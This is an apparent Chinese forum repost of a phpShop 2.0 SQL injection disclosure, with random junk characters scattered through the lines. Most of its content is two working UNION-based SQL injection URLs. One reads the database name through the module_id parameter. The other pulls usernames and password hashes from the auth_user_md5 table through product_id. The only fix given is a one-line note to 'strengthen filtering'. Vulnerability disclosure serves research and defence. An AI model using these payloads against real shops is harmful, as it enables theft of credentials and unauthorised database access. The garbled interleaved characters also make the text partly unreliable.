标题 : phpshop 2.0 SQL Injection Vulnerability& m1 P! l0 D: Y& Y) y
l$ F2 f' D% g+ j作者 : By onestree" H( z9 _% X* h# e4 M; i
下载地址 : http://code.google.com/p/phpshop/downloads/list
9 j7 \& c* P) @2 I& \+ S测试地址: windows 7 / ubuntu: I2 `( G A0 n$ k$ c6 W: ?
4 ?" N+ O# S( c' Z h p3 T1 T
5 f7 t% J1 ?# B1 h2 o! L
SQLi p0c:
7 e! L, [ c+ o$ \' ?+ G 8 m% i+ G; H& L: P9 z" r3 P- J
==================
2 f3 Q; ], E5 L8 t
# g# i+ ~- n" @) U! O. ohttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
9 ~, }' {) O0 O) zunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
W& _6 m5 ]/ K7 I2 D7 v8 c$ j
# ?4 R* N* f9 ?" S7 f& nhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
2 X+ y! [" z/ F) Y! X% s2 m) [ F/ f( }. s0 @
修复:+ R [9 T6 k2 i# F/ R# N* T& k
加强过滤' r/ F Q1 ^6 s) A6 `* S
$ P7 f t& x9 r+ t5 O$ e* c9 }. s& T6 K# w
|
发表于 2013-1-18 18:24:10
收藏
支持
反对